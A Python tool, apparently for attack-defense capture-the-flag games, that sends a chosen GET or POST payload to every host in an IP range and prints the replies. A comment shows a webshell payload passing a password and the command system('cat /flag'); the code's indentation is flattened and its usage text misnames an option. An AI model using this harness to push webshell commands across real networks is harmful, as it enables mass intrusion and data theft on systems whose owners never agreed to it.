#!/usr/bin/env python
# encoding: utf-8
from IPy import IP
import requests
import sys
# 批量Get_Flag
# IP地址处理,调用方法IPs("192.168.10.0/24")或IPs("192.168.10.0-20"),返回一个数组
def IPs(ip):
IPS = []
s1 = "/"
s2 = "-"
if ip.find(s1) > 0:
ip1 = IP(ip)
for i in ip1:
IPS.append(i)
elif (str(ip).find(s2)) > 0:
for i in range(int(str(ip)[str(ip).rfind('.') + 1:str(ip).rfind('-')]),
int(str(ip)[str(ip).rfind('-') + 1:]) + 1):
IPS.append(str(ip)[:str(ip).rfind('.') + 1] + str(i))
return IPS
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Referer': 'https://www.baidu.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 ',
'Cache-Control': 'no-cache'
}
# get请求
def get_Requests(ip, payload):
url = 'http://' + str(ip) + '/' + payload
try:
get_Flag = requests.get(url, headers=headers, timeout=3)
return get_Flag.text
except requests.exceptions.ConnectTimeout:
return "Connect Timeout"
# post请求
def post_Requests(ip, payload, post_data):
url = 'http://' + ip + '/' + payload
temp1 = post_data.split('&')
dist = {}
for i in temp1:
dist[i.split('=')[0]] = i.split('=')[1]
print(dist)
try:
get_Flag = requests.post(url,
headers=headers,
data=dist,
timeout=3)
return get_Flag.text
except requests.exceptions.ConnectTimeout:
return "Connect Timeout"
# 读取文件
def open_file(file_name):
data = []
for line in open(file_name):
test = line.strip('\n')
data.append(test)
return data
# 解析get数据包
def get_Data(data):
paload = data[0].split(' ')[1]
return paload
# pass=365Eval@Awd&cmd=system('cat /flag')
# 解析post数据包
def post_Data(data):
paload = data[0].split(' ')[1]
post = []
post.append(paload)
post_data = data[len(data) - 1]
post.append(post_data)
return post
def cmd():
request_type = ''
payload = ''
post_data = ''
filename = ''
ip = ''
if len(sys.argv) == 1:
print("Instructions for use")
print("python3 Game.py --type=get --ip=192.168.10.0/24 --pyload=test.php")
print("python3 Game.py --type=post --ip=192.168.10.0/24 --pyload=test.php --data=username=sss&passwd=ddd")
print("python3 Game.py --file=post.txt --ip=192.168.10.0/24 ")
main()
else:
for i in sys.argv:
if i.split('=')[0] == '--type':
request_type = str(i.split('=')[1])
elif i.split('=')[0] == '--payload':
payload = str(i.split('=')[1])
elif i.split('=')[0] == '--data':
post_data = str(i.split('=')[1])
elif i.split('=')[0] == '--file':
filename = str(i.split('=')[1])
elif i.split('=')[0] == '--ip':
ip = i.split('=')[1]
if len(request_type) != 0:
if request_type.upper() == 'GET':
for i in IPs(ip):
print('[*]testing ' + i)
print(get_Requests(i, payload))
elif request_type.upper() == 'POST':
for i in IPs(ip):
print('[*]testing ' + i)
print(post_Requests(i, post_Data(post_data)[0], post_Data(post_data)[1]))
else:
data = open_file(filename)
if data[0].split(' ')[0] == 'GET':
for i in IPs(ip):
print('[*]testing ' + i)
print(get_Requests(i, get_Data(data)))
elif data[0].split(' ')[0] == 'POST':
for i in IPs(ip):
print('[*]testing ' + i)
print(post_Requests(i, post_Data(data)[0], post_Data(data)[1]))
else:
print('error')
def main():
print('#get_Flag V2.0')
ip = input('Please enter the IP range >>>')
num = int(input('Please select request method 1 = get 2 = post 3 = auto>>>'))
if num != 3:
payload = input('Please enter the payload>>>')
if num == 2:
post_data = input('Please enter post_data>>>')
for i in IPs(ip):
print('[*]testing ' + i)
print(post_Requests(i, payload, post_data))
else:
for i in IPs(ip):
print('[*]testing ' + i)
print(get_Requests(i, payload))
else:
filename = input('Please enter filename>>>')
data = open_file(filename)
if data[0].split(' ')[0] == 'GET':
for i in IPs(ip):
print('[*]testing ' + i)
print(get_Requests(i, get_Data(data)))
elif data[0].split(' ')[0] == 'POST':
for i in IPs(ip):
print('[*]testing ' + i)
print(post_Requests(i, post_Data(data)[0], post_Data(data)[1]))
else:
print('error')
if __name__ == '__main__':
cmd()